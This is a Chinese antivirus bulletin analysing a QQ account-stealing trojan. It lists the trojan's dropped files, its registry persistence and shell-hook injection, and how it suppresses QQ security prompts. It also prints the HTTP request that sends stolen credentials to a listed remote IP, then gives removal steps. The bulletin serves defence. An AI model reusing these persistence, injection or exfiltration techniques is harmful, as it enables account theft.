一、 病毒标签:
病毒名称: Trojan/Win32.QQPass.shf[GameThief]
病毒类型: 木马
文件 MD5: BBD608B19C26E6F158777EF62721E4FF
公开范围: 完全公开
危害等级: 4
文件长度: 74,930 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: WinUpack
二、 病毒描述:
该恶意代码文件为QQ盗号木马,病毒运行后查找类名为“g”,标题为“2”的窗口,删除%Documents and Settings%\当前用户\Application Data\目录下的Dg32.bak文件,并衍生Dg32.bak、Dbg.Sys、Dbg.New病毒文件到该目录下,病毒创建一个X=0,Y=0,类名为:Edit,标题为:DT4TRTDTT的隐藏窗口,动态加载病毒衍生的Dbg.Sys文件,获取并调用该病毒文件的"InitDll"、"FreeDll"模块,"InitDll"模块设置成HOOK全局钩子,以便截取QQ账号密码,添加注册表项,试图将病毒文件注入到所有进程中,Dbg.Sys病毒文件判断自身是否被注入在Qq.exe、Explorer.exe、VerclsId.exe、iexplore.exe,如不是则退出,如是则将自身拷贝一份命名为Dg32.Tmp。病毒DLL被加载之后创建2个线程,反制QQ安全中心,释放病毒驱动文件到%System32%\drivers\目录下,命名为dHook.sys,查找类名为"TXGuiFoundation",标题为"放弃清除提示"、qq安全中心的窗口,找到后发送WM_KEYDOWN按键点击消息,被感染的用户会被病毒作者窃取QQ账号密码并以URL方式发送到作者指定的地址中。
三、 行为分析:
本地行为:
1、文件运行后会释放以下文件
%System32%\drivers\dHook.sys (病毒驱动文件,用于删除创建服务)
%Documents and Settings%\当前用户\Application Data\Dbg.Sys (该病毒文件反制QQ安全中心)
%Documents and Settings%\当前用户\Application Data\Dbg.New (该病毒文件反制QQ安全中心)
%Documents and Settings%\当前用户\Application Data\Dg32.bak
%Documents and Settings%\当前用户\Application Data\Dg32.Tmp (该病毒文件反制QQ安全中心)
2、新增注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{55B9E533-51C0-43C0-9508-BE4AC89B3266}\InProcServer32\@
值: 字符串: "%Documents and Settings%\当前用户\Application Data\Dbg.Sys"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{55B9E533-51C0-43C0-9508-BE4AC89B3266}
值: 字符串: ""
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SLENUMHOOK2\0000\Service
值: 字符串: "slEnumHook2"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
值:字符串: "\??\C:\Documentsand Settings\a\Application Data\Dbg.New.!\??\C:"
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
网络行为:
将截取到得游戏账号密码发送到以下URL地址中:
GET 58.221.246.***:81/9/qqlg.asp?N=%32%37%31%30%35%35%38%30%30&P=%77%73%31%32%33%31%32%33 HTTP/1.1
User-Agent: Mozilla
Host: 58.221.246.148:81
Cache-Control: no-cache
四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用atool中的文件管理删除病毒文件
%System32%\drivers\dHook.sys
%Documents and Settings%\当前用户\Application Data\Dbg.Sys
%Documents and Settings%\当前用户\Application Data\Dbg.New
%Documents and Settings%\当前用户\Application Data\Dg32.bak
%Documents and Settings%\当前用户\Application Data\Dg32.Tmp
(2) “开始”“运行”中输入“regedit”删除注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{55B9E533-51C0-43C0-9508-BE4AC89B3266}
删除CLSID键值下的{55B9E533-51C0-43C0-9508-BE4AC89B3266}键
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{55B9E533-51C0-43C0-9508-BE4AC89B3266}
删除ShellExecuteHooks键值下的{55B9E533-51C0-43C0-9508-BE4AC89B3266}键
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SLENUMHOOK2\0000\Service
删除Root键值下的LEGACY_SLENUMHOOK2键 |
|
发表于 2010-4-8 16:33